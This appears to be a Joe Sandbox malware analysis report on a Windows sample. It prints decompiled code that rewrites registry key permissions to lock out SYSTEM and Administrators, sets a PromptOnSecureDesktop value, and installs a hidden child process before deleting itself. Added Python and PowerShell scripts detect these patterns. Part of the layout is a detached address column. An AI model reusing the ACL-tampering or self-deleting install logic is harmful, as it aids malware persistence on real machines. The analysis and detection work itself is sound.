                                                                                                                                  				 *((intOrPtr*)(_t101 + 0x78)) = E0040F315;
                                                                                                                                  				 *((intOrPtr*)(_t101 + 0x7c)) = E0040E52E;
                                                                                                                                  				 *((intOrPtr*)(_t101 + 0x80)) = E0040E318;
                                                                                                                                  				 *((intOrPtr*)(_t101 + 0x84)) = E0040EAAF;
                                                                                                                                  				 *((intOrPtr*)(_t101 + 0x88)) = E0040E7B4;
                                                                                                                                  				 *((intOrPtr*)(_t101 + 0x8c)) = E0040DD05;
                                                                                                                                  				 *((intOrPtr*)(_t101 + 0x90)) = E0040E7FF;
                                                                                                                                  				 *((intOrPtr*)(_t101 + 0x94)) = E0040DD69;
                                                                                                                                  				 *((intOrPtr*)(_t101 + 0x98)) = E0040E819;
                                                                                                                                  				 *((intOrPtr*)(_t101 + 0x9c)) = E0040E854;
                                                                                                                                  				 *((intOrPtr*)(_t101 + 0xa0)) = E0040E8A1;
                                                                                                                                  				 *((intOrPtr*)(_t101 + 0xa4)) = E0040EA84;
                                                                                                                                  				 *((intOrPtr*)(_t101 + 0xa8)) = E0040DF4C;
                                                                                                                                  				 *((intOrPtr*)(_t101 + 0xac)) = E0040DF70;
                                                                                                                                  				 *((intOrPtr*)(_t101 + 0xb0)) = E0040E654;
                                                                                                                                  				 *((intOrPtr*)(_t101 + 0xb4)) = E0040E749;
                                                                                                                                  				 *((intOrPtr*)(_t101 + 0xb8)) = E004030B5;
                                                                                                                                  				 *((intOrPtr*)(_t101 + 0xbc)) = 0;
                                                                                                                                  				 *((intOrPtr*)(_t101 + 0xec)) = _t98;
                                                                                                                                  				 *((intOrPtr*)(_t101 + 0xf0)) = E00402684;
                                                                                                                                  				 *((intOrPtr*)(_t101 + 0xf4)) = E004026B2;
                                                                                                                                  				 *((intOrPtr*)(_t101 + 0xf8)) = E00402EF8;
                                                                                                                                  				 *((intOrPtr*)(_t101 + 0xfc)) = E00402F22;
                                                                                                                                  				 *((intOrPtr*)(_t101 + 0x100)) = 0;
                                                                                                                                  				 *((intOrPtr*)(_t101 + 0x104)) = 0;
                                                                                                                                  				 *((intOrPtr*)(_t101 + 0x108)) = 0;
                                                                                                                                  				 *((intOrPtr*)(_t101 + 0x10c)) = 0;
                                                                                                                                  				 *((intOrPtr*)(_t101 + 0x110)) = 0;
                                                                                                                                  				 *((intOrPtr*)(_t101 + 0x114)) = E0040A7C1;
                                                                                                                                  				 *((intOrPtr*)(_t101 + 0x118)) = E00401FEB;
                                                                                                                                  				 *((intOrPtr*)(_t101 + 0x11c)) = 0x401ffe;
                                                                                                                                  				 *((intOrPtr*)(_t101 + 0x138)) = E00406509;
                                                                                                                                  				 *((intOrPtr*)(_t101 + 0x140)) = E00405D34;
                                                                                                                                  				 *((intOrPtr*)(_t101 + 0x144)) = E00405C05;
                                                                                                                                  				 *((intOrPtr*)(_t101 + 0x148)) = E00405D93;
                                                                                                                                  				 *((intOrPtr*)(_t101 + 0x14c)) = E00405E37;
                                                                                                                                  				 *((intOrPtr*)(_t101 + 0x150)) = E004048C9;
                                                                                                                                  				 *((intOrPtr*)(_t101 + 0x154)) = E00405E21;
                                                                                                                                  				 *((intOrPtr*)(_t101 + 0x158)) = E00405CE1;
                                                                                                                                  				 *((intOrPtr*)(_t101 + 0x15c)) = E00405DED;
                                                                                                                                  				 *((intOrPtr*)(_t101 + 0x160)) = E00404EFD;
                                                                                                                                  				 *((intOrPtr*)(_t101 + 0x164)) = E004048C9;
                                                                                                                                  				 *((intOrPtr*)(_t101 + 0x168)) = E0040488C;
                                                                                                                                  				 *((intOrPtr*)(_t101 + 0x174)) = E00404F13;
                                                                                                                                  				 *((intOrPtr*)(_t101 + 0x178)) = E00404F50;
                                                                                                                                  				 *((intOrPtr*)(_t101 + 0x17c)) = E004082BB;
                                                                                                                                  				 *((intOrPtr*)(_t101 + 0x180)) = E004082C1;
                                                                                                                                  				 *((intOrPtr*)(_t101 + 0x184)) = 0x4082c7;
                                                                                                                                  				 *((intOrPtr*)(_t101 + 0x188)) = 0x408308;
                                                                                                                                  				return _t98;
                                                                                                                                  			}


Memory Dump Source
• Source File: 00000000.00000002.279757756.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.279776907.0000000000414000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_OcmKX57vR7.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 44bd52e04b48cb4f37f88c1faa2861bd1aa750469feb028cdba60f87f31a69ab
• Instruction ID: 64893a5cec851924fefc00027ac9d8258265f32e823952a4835c6918c3f2ac29
• Opcode Fuzzy Hash: 44bd52e04b48cb4f37f88c1faa2861bd1aa750469feb028cdba60f87f31a69ab
• Instruction Fuzzy Hash: 59714BB4501B41CFD360CF66D548782BBE0BB54308F10CD6ED5AAAB790DBB86588DF98
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000002.280127790.0000000000AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ad0000_OcmKX57vR7.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
• Instruction ID: 6f27976c2e8aaa52d592de10d0f875c698b2079f4cd494174258d198b17186d8
• Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
• Instruction Fuzzy Hash: BC01A7766006048FDF21CF64C804FAA33F6EB85315F4544AAD54797342E774A9418B90
Uniqueness

Uniqueness Score: -1.00%

APIs
• ExitProcess.KERNEL32 ref: 00AD9E6D
• lstrcpy.KERNEL32(?,00000000), ref: 00AD9FE1
• lstrcat.KERNEL32(?,?), ref: 00AD9FF2
• lstrcat.KERNEL32(?,0041070C), ref: 00ADA004
• GetFileAttributesExA.KERNEL32(?,?,?), ref: 00ADA054
• DeleteFileA.KERNEL32(?), ref: 00ADA09F
• GetEnvironmentVariableA.KERNEL32(00000000,?,?,?,?,000001F4), ref: 00ADA0D6
• lstrcpy.KERNEL32 ref: 00ADA12F
• lstrlen.KERNEL32(00000022), ref: 00ADA13C
• GetTempPathA.KERNEL32(000001F4,?), ref: 00AD9F13
  • Part of subcall function 00AD7029: GetVolumeInformationA.KERNEL32(?,00000000,00000000,00412F0C,00000000,00000000,00000000,00000000), ref: 00AD7081
  • Part of subcall function 00AD6F30: GetModuleHandleA.KERNEL32(00410380,00410670,00000000,\\.\pipe\uvfipga,00AD7043), ref: 00AD6F4E
  • Part of subcall function 00AD6F30: GetProcAddress.KERNEL32(00000000), ref: 00AD6F55
  • Part of subcall function 00AD6F30: GetSystemDirectoryA.KERNEL32(C:\Windows\SysWOW64\,00000104), ref: 00AD6F7B
  • Part of subcall function 00AD6F30: GetWindowsDirectoryA.KERNEL32(C:\Windows\SysWOW64\,00000104,?,00000000), ref: 00AD6F92
• RegOpenKeyExA.ADVAPI32(80000001,00000000,?,?,?,00000103,?,?,?,?), ref: 00ADA1A2
• RegSetValueExA.ADVAPI32(?,00000001,?,00000001,?,000001F5,?,?,?,00000103,?,?,?,?), ref: 00ADA1C5
• GetModuleHandleA.KERNEL32(?,?,00000104,?,?,00000010,?,?,00000044,?,?,?,?,?,?,00000103), ref: 00ADA214
• GetModuleFileNameA.KERNEL32(00000000,?,?,00000104,?,?,00000010,?,?,00000044), ref: 00ADA21B
• GetDriveTypeA.KERNEL32(?), ref: 00ADA265
• lstrcat.KERNEL32(?,00000000), ref: 00ADA29F
• lstrcat.KERNEL32(?,00410A34), ref: 00ADA2C5
• lstrcat.KERNEL32(?,00000022), ref: 00ADA2D9
• lstrcat.KERNEL32(?,00410A34), ref: 00ADA2F4
• wsprintfA.USER32 ref: 00ADA31D
• lstrcat.KERNEL32(?,00000000), ref: 00ADA345
• lstrcat.KERNEL32(?,?), ref: 00ADA364
• CreateProcessA.KERNEL32(?,?,?,?,?,08000000,?,?,?,?,?,?,00000104,?,?,00000010), ref: 00ADA387
• DeleteFileA.KERNEL32(?,?,?,?,?,?,08000000,?,?,?,?,?,?,00000104,?), ref: 00ADA398
• RegCloseKey.ADVAPI32(?,?,00000001,?,000001F5,?,?,?,00000103,?,?,?,?), ref: 00ADA1D1
  • Part of subcall function 00AD9966: RegOpenKeyExA.ADVAPI32(80000001,00000000), ref: 00AD999D
  • Part of subcall function 00AD9966: RegDeleteValueA.ADVAPI32(?,00000000), ref: 00AD99BD
  • Part of subcall function 00AD9966: RegCloseKey.ADVAPI32(?), ref: 00AD99C6
• GetModuleHandleA.KERNEL32(?,?,0000012C), ref: 00ADA3DB
• GetModuleFileNameA.KERNEL32(00000000,?,?,0000012C), ref: 00ADA3E2
• GetDriveTypeA.KERNEL32(00000022), ref: 00ADA41D
Strings
Memory Dump Source
• Source File: 00000000.00000002.280127790.0000000000AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ad0000_OcmKX57vR7.jbxd
Yara matches
Similarity
• API ID: lstrcat$FileModule$DeleteHandle$CloseDirectoryDriveNameOpenProcessTypeValuelstrcpy$AddressAttributesCreateEnvironmentExitInformationPathProcSystemTempVariableVolumeWindowslstrlenwsprintf
• String ID: "$"$"$D$P$\
• API String ID: 1653845638-2605685093
• Opcode ID: f5c9b7b3d8278428c0912f33a1d156d5b052250314973edf34d1b588c2b8a337
• Instruction ID: b568d63c7a68c2aae07d916e7ecd401e1ecb298828109104d3c0c40f9d49894e
• Opcode Fuzzy Hash: f5c9b7b3d8278428c0912f33a1d156d5b052250314973edf34d1b588c2b8a337
• Instruction Fuzzy Hash: 5EF153B1D40259AFDF11DBA0CD49EEF7BBCAB18300F1444A7F60AE6241E7758A848F65
Uniqueness

Uniqueness Score: -1.00%
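The API list above shows, inside one routine, an HKCU key being opened (0x80000001 is HKEY_CURRENT_USER) and a value set with RegSetValueExA, the running image's path read with GetModuleFileNameA(NULL, ...), a child started by CreateProcessA with creation flags 0x08000000 (CREATE_NO_WINDOW), and a DeleteFileA immediately after it. The matcher below is an added example, not part of the Joe Sandbox report and not code from the sample: it parses trace lines written in the report's own `Api.Module(args), ref: addr` notation and flags that ordered sequence. The trace it runs on is constructed for the example: the file paths and the filled-in arguments are invented (the report shows `?` for most of them), and the stage names are the example's own.

```python
import re

# Win32 constants that appear literally in the API list above.
HKEY_CURRENT_USER = 0x80000001
CREATE_NO_WINDOW = 0x08000000

# Matches the report's 'Api.Module(args), ref: addr' notation; args are kept as raw strings.
_LINE = re.compile(
    r"^(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?(?:,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+))?")


def parse_trace(text):
    """Turn trace lines into (api, [args], ref) tuples; lines that do not match are ignored."""
    events = []
    for raw in text.splitlines():
        line = raw.strip().lstrip("•").strip()
        m = _LINE.match(line)
        if m:
            args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
            events.append((m["api"], args, m["ref"]))
    return events


def _hex(arg):
    """Report arguments are bare hex words; '?' (unknown) becomes None."""
    try:
        return int(arg, 16)
    except ValueError:
        return None


def detect_install_and_vanish(events):
    """Stateful match of the sequence: HKCU value write -> CreateProcess with
    CREATE_NO_WINDOW -> DeleteFile of the running image. Returns the stage
    names reached, in order; all three together are the finding."""
    stages = []
    hkcu_open = False
    own_path = None            # filled from GetModuleFileNameA(NULL, buf, ...)
    for api, args, _ref in events:
        if api == "GetModuleFileNameA" and len(args) > 1 and _hex(args[0]) == 0:
            own_path = args[1]
        elif api == "RegOpenKeyExA" and args and _hex(args[0]) == HKEY_CURRENT_USER:
            hkcu_open = True
        elif api == "RegSetValueExA" and hkcu_open and "hkcu_value_write" not in stages:
            stages.append("hkcu_value_write")
        elif api == "CreateProcessA" and len(args) > 5 and "hkcu_value_write" in stages:
            flags = _hex(args[5])                      # dwCreationFlags is the 6th parameter
            if flags is not None and flags & CREATE_NO_WINDOW and "hidden_child" not in stages:
                stages.append("hidden_child")
        elif (api == "DeleteFileA" and args and own_path and args[0] == own_path
              and "hidden_child" in stages and "self_delete" not in stages):
            stages.append("self_delete")
    return stages


# Constructed trace (not from the sample): argument values are invented so the
# stages can be matched; the real report shows '?' for most of them.
SAMPLE_TRACE = r"""
• GetTempPathA.KERNEL32(000001F4,?), ref: 00AD9F13
• DeleteFileA.KERNEL32(C:\Users\user\AppData\Local\Temp\old.tmp), ref: 00ADA09F
• RegOpenKeyExA.ADVAPI32(80000001,00000000,?,?,?,00000103,?,?,?,?), ref: 00ADA1A2
• RegSetValueExA.ADVAPI32(?,00000001,?,00000001,?,000001F5), ref: 00ADA1C5
• RegCloseKey.ADVAPI32(?), ref: 00ADA1D1
• GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\sample.exe,00000104), ref: 00ADA21B
• GetDriveTypeA.KERNEL32(C:\), ref: 00ADA265
• CreateProcessA.KERNEL32(?,?,?,?,?,08000000,?,?,?,?), ref: 00ADA387
• DeleteFileA.KERNEL32(C:\Users\user\Desktop\sample.exe), ref: 00ADA398
"""

if __name__ == "__main__":
    print(detect_install_and_vanish(parse_trace(SAMPLE_TRACE)))
```

Two caveats when using this against real data. The report's API list is ordered by reference address and is not a chronological trace (RegCloseKey at 00ADA1D1 is listed after DeleteFileA at 00ADA398), so the matcher expects input in execution order, as an API monitor would record it. And because the report elides most arguments as `?`, the self-delete stage can only be matched where the monitor captured the path passed to DeleteFileA.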

C-Code - Quality: 99%
	E00407A95(void* _a4, char* _a8, signed int _a12) {
		int _v8;
		void* _v12;
		void* _v16;
		void* _v20;
		int _v24;
		void* _v28;
		struct _ACL* _v32;
		long _v36;
		long _v40;
		long _v44;
		int _v48;
		int _v52;
		union _SID_NAME_USE _v56;
		int _v60;
		int _v64;
		void _v132;
		char _v388;
		char _v516;
		struct _SECURITY_DESCRIPTOR _v1540;
		void* _t95;
		void* _t104;
		void* _t107;
		void* _t111;
		void* _t116;
		struct _ACL* _t117;
		void* _t118;
		void* _t120;
		void* _t122;
		void* _t123;
		void* _t125;
		char* _t126;
		void* _t130;
		void* _t134;
		void* _t135;
		signed int _t136;
		void* _t143;
		void* _t146;
		int _t148;
		int _t151;
		void** _t159;
		void* _t161;
		void* _t164;
		signed int _t172;
		void* _t173;
		char* _t174;
		void* _t175;
		void* _t176;

		_v32 = 0;
		_v12 = 0;
		_v28 = 0;
		// 0xE0100 = READ_CONTROL | WRITE_DAC | WRITE_OWNER | KEY_WOW64_64KEY: the key
		// (_a4 root, _a8 subkey) is opened with rights to read and rewrite its
		// security descriptor, through the 64-bit registry view.
		if(RegOpenKeyExA(_a4, _a8, 0, 0xe0100,  &_v28) != 0) {
			return 0;
		}
		// Current user name into _v388 (buffer length 0x80).
		_v40 = 0x80;
		_t95 = GetUserNameA( &_v388,  &_v40);
		__eflags = _t95;
		if(_t95 == 0) {
			L48:
			RegCloseKey(_v28);
			return _v12;
		} else {
			// Resolve the name to its SID (_v132, 0x44 = SECURITY_MAX_SID_SIZE) and domain (_v516).
			_v36 = 0x44;
			_v44 = 0x80;
			_t104 = LookupAccountNameA(0,  &_v388,  &_v132,  &_v36,  &_v516,  &_v44,  &_v56);
			__eflags = _t104;
			if(_t104 == 0) {
				goto L48;
			}
			// 5 = OWNER_SECURITY_INFORMATION | DACL_SECURITY_INFORMATION; the key's
			// self-relative security descriptor lands in the 0x400-byte _v1540 buffer.
			_v48 = 0x400;
			_t107 = RegGetKeySecurity(_v28, 5,  &_v1540,  &_v48);
			__eflags = _t107;
			if(_t107 != 0) {
				goto L48;
			}
			_t111 = GetSecurityDescriptorOwner( &_v1540,  &_v16,  &_v60);
			__eflags = _t111;
			if(_t111 == 0) {
				L12:
				_v24 = 0;
				_t116 = GetSecurityDescriptorDacl( &_v1540,  &_v64,  &_v32,  &_v52);
				__eflags = _t116;
				if(_t116 == 0) {
					L47:
					goto L48;
				}
				// A NULL DACL (call succeeded, no ACL present) leaves nothing to walk.
				_t117 = _v32;
				__eflags = _t117;
				if(_t117 == 0) {
					goto L47;
				}
				_t164 = 0;
				_v8 = 0;
				__eflags = 0 - _t117->AceCount;
				if(0 >= _t117->AceCount) {
					goto L47;
				} else {
					goto L15;
				}
				// Walk the DACL one ACE at a time, indexed by _v8.
				do {
					L15:
					_t118 = GetAce(_t117, _v8,  &_v20);
					__eflags = _t118;
					if(_t118 == 0) {
						L31:
						_t73 =  &_v8;
                                                                                                                                  								 *_t73 = _v8 + 1;
                                                                                                                                  								__eflags =  *_t73;
                                                                                                                                  								goto L32;
                                                                                                                                  							}
                                                                                                                                  							_t172 = 0;
                                                                                                                                  							_v16 = _v20 + 8;
                                                                                                                                  							__eflags = _t164;
                                                                                                                                  							if(_t164 <= 0) {
                                                                                                                                  								L21:
                                                                                                                                  								__eflags = _t164 - 0x20;
                                                                                                                                  								if(_t164 < 0x20) {
                                                                                                                                  									 *((intOrPtr*)(_t176 + _t164 * 4 - 0x100)) = _v16;
                                                                                                                                  									_t164 = _t164 + 1;
                                                                                                                                  									__eflags = _t164;
                                                                                                                                  								}
                                                                                                                                  								_t134 = EqualSid( &_v132, _v16);
                                                                                                                                  								_t159 = _v20;
                                                                                                                                  								__eflags = _t134;
                                                                                                                                  								if(_t134 == 0) {
                                                                                                                                  									_t135 = 0x20000;
                                                                                                                                  								} else {
                                                                                                                                  									asm("sbb eax, eax");
                                                                                                                                  									_t135 = ( ~_a12 & 0x00010006) + 0xe0039;
                                                                                                                                  								}
                                                                                                                                  								__eflags = _t159[1] - _t135;
                                                                                                                                  								if(_t159[1] != _t135) {
                                                                                                                                  									_t159[1] = _t135;
                                                                                                                                  									_t159 = _v20;
                                                                                                                                  									_v24 = 1;
                                                                                                                                  								}
                                                                                                                                  								__eflags =  *_t159;
                                                                                                                                  								if( *_t159 != 0) {
                                                                                                                                  									L30:
                                                                                                                                  									 *_t159 = 0;
                                                                                                                                  									_t136 = _v16;
                                                                                                                                  									__eflags =  *(_t136 + 8);
                                                                                                                                  									_t68 =  *(_t136 + 8) == 0;
                                                                                                                                  									__eflags = _t68;
                                                                                                                                  									_v24 = 1;
                                                                                                                                  									 *((char*)(_v20 + 1)) = 2 + (_t136 & 0xffffff00 | _t68) * 8;
                                                                                                                                  									goto L31;
                                                                                                                                  								} else {
                                                                                                                                  									__eflags = _t159[0] & 0x00000010;
                                                                                                                                  									if((_t159[0] & 0x00000010) == 0) {
                                                                                                                                  										goto L31;
                                                                                                                                  									}
                                                                                                                                  									goto L30;
                                                                                                                                  								}
                                                                                                                                  							} else {
                                                                                                                                  								goto L17;
                                                                                                                                  							}
                                                                                                                                  							while(1) {
                                                                                                                                  								L17:
                                                                                                                                  								_t143 = EqualSid( *(_t176 + _t172 * 4 - 0x100), _v16);
                                                                                                                                  								__eflags = _t143;
                                                                                                                                  								if(_t143 != 0) {
                                                                                                                                  									break;
                                                                                                                                  								}
                                                                                                                                  								_t172 = _t172 + 1;
                                                                                                                                  								__eflags = _t172 - _t164;
                                                                                                                                  								if(_t172 < _t164) {
                                                                                                                                  									continue;
                                                                                                                                  								}
                                                                                                                                  								break;
                                                                                                                                  							}
                                                                                                                                  							__eflags = _t172 - _t164;
                                                                                                                                  							if(_t172 >= _t164) {
                                                                                                                                  								goto L21;
                                                                                                                                  							}
                                                                                                                                  							DeleteAce(_v32, _v8);
                                                                                                                                  							_v24 = 1;
                                                                                                                                  							L32:
                                                                                                                                  							_t117 = _v32;
                                                                                                                                  							__eflags = _v8 - (_t117->AceCount & 0x0000ffff);
                                                                                                                                  						} while (_v8 < (_t117->AceCount & 0x0000ffff));
                                                                                                                                  						__eflags = _v24;
                                                                                                                                  						if(_v24 == 0) {
                                                                                                                                  							goto L47;
                                                                                                                                  						}
                                                                                                                                  						__eflags =  *0x4121a8; // 0x0
                                                                                                                                  						if(__eflags == 0) {
                                                                                                                                  							L41:
                                                                                                                                  							_v12 = 1;
                                                                                                                                  							_t173 = LocalAlloc(0x40, 0x14);
                                                                                                                                  							__eflags = _t173;
                                                                                                                                  							if(_t173 != 0) {
                                                                                                                                  								_t120 = InitializeSecurityDescriptor(_t173, 1);
                                                                                                                                  								__eflags = _t120;
                                                                                                                                  								if(_t120 != 0) {
                                                                                                                                  									_t122 = SetSecurityDescriptorDacl(_t173, 1, _v32, 0);
                                                                                                                                  									__eflags = _t122;
                                                                                                                                  									if(_t122 != 0) {
                                                                                                                                  										_t123 = RegSetKeySecurity(_v28, 4, _t173);
                                                                                                                                  										__eflags = _t123;
                                                                                                                                  										if(_t123 == 0) {
                                                                                                                                  											_v12 = 1;
                                                                                                                                  										}
                                                                                                                                  									}
                                                                                                                                  								}
                                                                                                                                  								LocalFree(_t173);
                                                                                                                                  							}
                                                                                                                                  							goto L47;
                                                                                                                                  						}
                                                                                                                                  						__eflags =  *0x412cc0; // 0x0
                                                                                                                                  						if(__eflags == 0) {
                                                                                                                                  							goto L41;
                                                                                                                                  						}
                                                                                                                                  						_v12 = 0;
                                                                                                                                  						_t125 = RegOpenKeyExA(_a4, _a8, 0, 0x103,  &_v12);
                                                                                                                                  						__eflags = _t125;
                                                                                                                                  						if(_t125 != 0) {
                                                                                                                                  							goto L41;
                                                                                                                                  						}
                                                                                                                                  						_t126 = 0x4121a8;
                                                                                                                                  						_t83 =  &(_t126[1]); // 0x4121a9
                                                                                                                                  						_t174 = _t83;
                                                                                                                                  						do {
                                                                                                                                  							_t161 =  *_t126;
                                                                                                                                  							_t126 =  &(_t126[1]);
                                                                                                                                  							__eflags = _t161;
                                                                                                                                  						} while (_t161 != 0);
                                                                                                                                  						_t130 = RegSetValueExA(_v12, E00402544("PromptOnSecureDesktop", 0x4106dc, 0xa, 0xe4, 0xc8), 0, 2, 0x4121a8, _t126 - _t174 + 1);
                                                                                                                                  						__eflags = _t130;
                                                                                                                                  						if(_t130 == 0) {
                                                                                                                                  							 *0x412cc0 = 0;
                                                                                                                                  						}
                                                                                                                                  						goto L41;
                                                                                                                                  					}
                                                                                                                                  					_t146 = EqualSid( &_v132, _v16);
                                                                                                                                  					__eflags = _t146;
                                                                                                                                  					if(_t146 != 0) {
                                                                                                                                  						goto L12;
                                                                                                                                  					}
                                                                                                                                  					_v12 = 1;
                                                                                                                                  					_t175 = LocalAlloc(0x40, 0x14);
                                                                                                                                  					__eflags = _t175;
                                                                                                                                  					if(_t175 != 0) {
                                                                                                                                  						_t148 = InitializeSecurityDescriptor(_t175, 1);
                                                                                                                                  						__eflags = _t148;
                                                                                                                                  						if(_t148 != 0) {
                                                                                                                                  							_t151 = SetSecurityDescriptorOwner(_t175,  &_v132, 0);
                                                                                                                                  							__eflags = _t151;
                                                                                                                                  							if(_t151 != 0) {
                                                                                                                                  								RegSetKeySecurity(_v28, 1, _t175);
                                                                                                                                  							}
                                                                                                                                  						}
                                                                                                                                  						LocalFree(_t175);
                                                                                                                                  					}
                                                                                                                                  					goto L12;
                                                                                                                                  				}
                                                                                                                                  			}
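The decompiled function above walks a registry key's DACL (GetSecurityDescriptorDacl, GetAce), compares each ACE's SID against a SID held at _v132 (EqualSid), leaves ACEs for any other SID with access mask 0x20000 (READ_CONTROL only), gives its own SID 0xF003F (KEY_ALL_ACCESS) or 0xE0039 (KEY_ALL_ACCESS without DELETE, KEY_SET_VALUE and KEY_CREATE_SUB_KEY), forces the ACE type to 0 (ACCESS_ALLOWED_ACE_TYPE) with CONTAINER_INHERIT_ACE in the flags, drops ACEs whose SID was already seen (DeleteAce), and writes the result back with SetSecurityDescriptorDacl and RegSetKeySecurity using security information 4 (DACL_SECURITY_INFORMATION); the trailing branch replaces the key owner with SetSecurityDescriptorOwner and RegSetKeySecurity with security information 1 (OWNER_SECURITY_INFORMATION). The script below is an added example, not code from the Joe Sandbox report or from the sample: it audits registry keys for that resulting ACL shape. The key paths and the list of trusted principals are assumptions chosen for illustration.

```powershell
# Added example, not code from the Joe Sandbox report or from the sample.
# Audits registry keys for the DACL/owner rewrite pattern visible in the
# decompiled function above. The key paths and the trusted-principal list are
# assumptions chosen for illustration; adjust them for the host being checked.
[CmdletBinding()]
param(
    [string[]]$KeyPath = @(
        'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run',
        'HKLM:\SYSTEM\CurrentControlSet\Services'
    )
)

# READ_CONTROL (0x20000) is all the sample leaves on ACEs whose SID is not its own.
# For its own SID it writes 0xF003F (KEY_ALL_ACCESS) or 0xE0039, which is
# KEY_ALL_ACCESS minus DELETE (0x10000), KEY_SET_VALUE (2) and KEY_CREATE_SUB_KEY (4).
$ReadControlOnly   = 0x20000
$SelfMasks         = @(0xF003F, 0xE0039)
$TrustedPrincipals = @('NT AUTHORITY\SYSTEM', 'BUILTIN\Administrators')

function Test-RegistryKeyAclTampering {
    param([Parameter(Mandatory)][string]$Path)

    $acl      = Get-Acl -Path $Path -ErrorAction Stop
    $findings = New-Object System.Collections.Generic.List[string]

    # The trailing branch of the listing installs a new owner via
    # SetSecurityDescriptorOwner + RegSetKeySecurity(..., 1 = OWNER_SECURITY_INFORMATION, ...).
    if ($acl.Owner -notin $TrustedPrincipals -and $acl.Owner -notlike '*TrustedInstaller') {
        $findings.Add("owner is '$($acl.Owner)'")
    }

    $inherited = 0
    foreach ($ace in $acl.Access) {
        $id   = $ace.IdentityReference.Value
        $mask = [int]$ace.RegistryRights
        if ($ace.IsInherited) { $inherited++ }

        # SYSTEM or Administrators left with READ_CONTROL only is the signature of the rewrite.
        if ($ace.AccessControlType -eq 'Allow' -and $id -in $TrustedPrincipals -and $mask -eq $ReadControlOnly) {
            $findings.Add("$id reduced to READ_CONTROL")
        }
        # An unexpected principal holding one of the two masks the sample builds for itself.
        if ($ace.AccessControlType -eq 'Allow' -and $id -notin $TrustedPrincipals -and $mask -in $SelfMasks) {
            $findings.Add(('{0} holds 0x{1:X}' -f $id, $mask))
        }
    }
    # After the GetAce/DeleteAce loop and RegSetKeySecurity(..., 4 = DACL_SECURITY_INFORMATION, ...)
    # every ACE is explicit (type 0, flags CONTAINER_INHERIT_ACE); nothing inherited survives.
    if ($inherited -eq 0 -and $acl.Access.Count -gt 0) {
        $findings.Add('no inherited ACEs on the key')
    }

    [pscustomobject]@{
        Key      = $Path
        Suspect  = ($findings.Count -gt 0)
        Findings = ($findings -join '; ')
    }
}

foreach ($k in $KeyPath) {
    try   { Test-RegistryKeyAclTampering -Path $k }
    catch { Write-Warning ('{0}: {1}' -f $k, $_.Exception.Message) }
}
```

Run it elevated, since a key that has already been rewritten this way grants a normal administrator READ_CONTROL only; reading the security descriptor still works, which is exactly what the script relies on. The "no inherited ACEs" finding is corroboration rather than proof on its own, because some keys are legitimately protected from inheritance, whereas SYSTEM or Administrators holding nothing but READ_CONTROL on an autostart or services key is worth an immediate look.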
Address column belonging to the report's two-column decompilation layout, separated from its code lines during extraction (per-line pairing is not recoverable):
0x00407aae 0x00407ab4 0x00407ab7 0x00407ac2 0x00000000 0x00407ac4 0x00407adc 0x00407adf 0x00407ae5 0x00407ae7
0x00407da7 0x00407daa 0x00000000 0x00407aed 0x00407b0c 0x00407b13 0x00407b16 0x00407b1c 0x00407b1e 0x00000000
0x00000000 0x00407b34 0x00407b3b 0x00407b41 0x00407b43 0x00000000 0x00000000 0x00407b59 0x00407b5f 0x00407b61
0x00407bb8 0x00407bcb 0x00407bce 0x00407bd4 0x00407bd6 0x00407da6 0x00000000 0x00407da6 0x00407bdc 0x00407bdf
0x00407be1 0x00000000 0x00000000 0x00407be9 0x00407beb 0x00407bee 0x00407bf2 0x00000000 0x00000000 0x00000000
0x00000000 0x00407bf8 0x00407bf8 0x00407c00 0x00407c06 0x00407c08 0x00407cc6 0x00407cc6 0x00407cc6 0x00407cc6
0x00000000
                                                                                                                                  0x00407cc6
                                                                                                                                  0x00407c14
                                                                                                                                  0x00407c16
                                                                                                                                  0x00407c19
                                                                                                                                  0x00407c1b
                                                                                                                                  0x00407c4f
                                                                                                                                  0x00407c4f
                                                                                                                                  0x00407c52
                                                                                                                                  0x00407c57
                                                                                                                                  0x00407c5e
                                                                                                                                  0x00407c5e
                                                                                                                                  0x00407c5e
                                                                                                                                  0x00407c66
                                                                                                                                  0x00407c6c
                                                                                                                                  0x00407c6f
                                                                                                                                  0x00407c71
                                                                                                                                  0x00407c86
                                                                                                                                  0x00407c73
                                                                                                                                  0x00407c78
                                                                                                                                  0x00407c7f
                                                                                                                                  0x00407c7f
                                                                                                                                  0x00407c8b
                                                                                                                                  0x00407c8e
                                                                                                                                  0x00407c90
                                                                                                                                  0x00407c93
                                                                                                                                  0x00407c96
                                                                                                                                  0x00407c96
                                                                                                                                  0x00407c9d
                                                                                                                                  0x00407c9f
                                                                                                                                  0x00407ca7
                                                                                                                                  0x00407ca7
                                                                                                                                  0x00407ca9
                                                                                                                                  0x00407cac
                                                                                                                                  0x00407cb2
                                                                                                                                  0x00407cb2
                                                                                                                                  0x00407cb5
                                                                                                                                  0x00407cc3
                                                                                                                                  0x00000000
                                                                                                                                  0x00407ca1
                                                                                                                                  0x00407ca1
                                                                                                                                  0x00407ca5
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00407ca5
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00407c1d
                                                                                                                                  0x00407c1d
                                                                                                                                  0x00407c27
                                                                                                                                  0x00407c2d
                                                                                                                                  0x00407c2f
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00407c31
